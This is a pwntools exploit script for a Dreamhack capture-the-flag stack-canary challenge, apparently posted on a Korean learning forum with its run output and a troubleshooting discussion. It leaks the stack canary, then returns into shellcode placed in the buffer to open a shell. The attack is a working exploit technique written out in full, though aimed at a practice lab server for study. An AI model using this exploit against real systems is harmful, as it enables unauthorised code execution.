from pwn import *
def slog(n, m):
    """Print *n* and the hex form of *m* as a pwntools success line (``[+] n: 0x..``).

    Returns whatever ``success()`` returns; ``m`` must be an int so that
    ``hex()`` accepts it.
    """
    return success(f"{n}: {hex(m)}")
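p = remote("host3.dreamhack.games", 10234)
context.arch = "amd64"

# [1] Get information about buf
# The target prints the address of buf and the distance from buf to the saved
# rbp ($rbp); the canary offset is derived from those two values.
p.recvuntil(b"buf: ")
buf = int(p.recvline()[:-1], 16)
slog("Address of buf", buf)
p.recvuntil(b"$rbp: ")
buf2sfp = int(p.recvline().split()[0])
buf2cnry = buf2sfp - 8  # canary sits in the 8 bytes just below the saved rbp
slog("buf <=> sfp", buf2sfp)
slog("buf <=> canary", buf2cnry)

# [2] Leak canary value
# Overwrite the canary's low (null) byte with one 'A' so the echo of buf runs
# on into the canary; the 7 bytes that follow the payload are its upper bytes.
payload = b"A" * (buf2cnry + 1)
p.sendafter(b"Input:", payload)
p.recvuntil(payload)
cnry = u64(b"\x00" + p.recvn(7))
slog("Canary", cnry)

# [3] Exploit
sh = asm(shellcraft.sh())
# ljust() never truncates: if the shellcode is longer than the space below the
# canary the whole frame layout below is wrong, so fail loudly instead.
if len(sh) > buf2cnry:
    raise SystemExit(f"shellcode ({len(sh)} bytes) does not fit below the canary ({buf2cnry} bytes)")
payload = sh.ljust(buf2cnry, b"A")
payload += p64(cnry)   # keep the canary intact
payload += b"B" * 8    # saved rbp, value irrelevant
payload += p64(buf)    # return into the shellcode at the start of buf
# The final input is newline-terminated. If the target reads it with a
# newline-terminated reader (gets()/fgets()-style), a 0x0a byte anywhere in the
# canary, the shellcode or the buf address truncates the payload there and the
# canary check fails (e.g. the leaked canary 0x325b0a27bab65900 contains 0x0a).
# Both values change per process, so the remedy is to reconnect and retry.
if b"\n" in payload:
    raise SystemExit("payload contains 0x0a; reconnect to get a fresh canary/address and retry")
p.sendlineafter(b"Input:", payload)
p.interactive()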
--결과는
[+] Opening connection to host3.dreamhack.games on port 10234: Done
[+] Address of buf: 0x7fffd3c518f0
[+] buf <=> sfp: 0x60
[+] buf <=> canary: 0x58
[+] Canary: 0x325b0a27bab65900
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ id
$ ls
[*] Closed connection to host3.dreamhack.games port 10234
[*] Got EOF while sending in interactive
다들 동일하게 하신것 같은데 왜 안될까요.ㅠㅠ 로컬에서는 잘 돌아요.;;
p.sendlineafter("Input:", payload)대신 p.sendline(payload)하니깐 되네요... (참고: 위 출력의 카나리 0x325b0a27bab65900에는 0x0a(개행) 바이트가 들어 있습니다. 두 번째 입력을 gets()처럼 개행에서 멈추는 함수로 읽는다면 페이로드가 그 바이트에서 잘려 카나리 검사에 실패하고, 바로 위 결과처럼 EOF가 납니다. sendline으로 바꿔서 된 것은 새 연결에서 0x0a가 없는 카나리를 받았기 때문일 가능성이 큽니다. 최종 페이로드에 b"\n"이 들어 있으면 재접속해서 다시 시도하도록 검사를 넣는 것이 안전합니다.)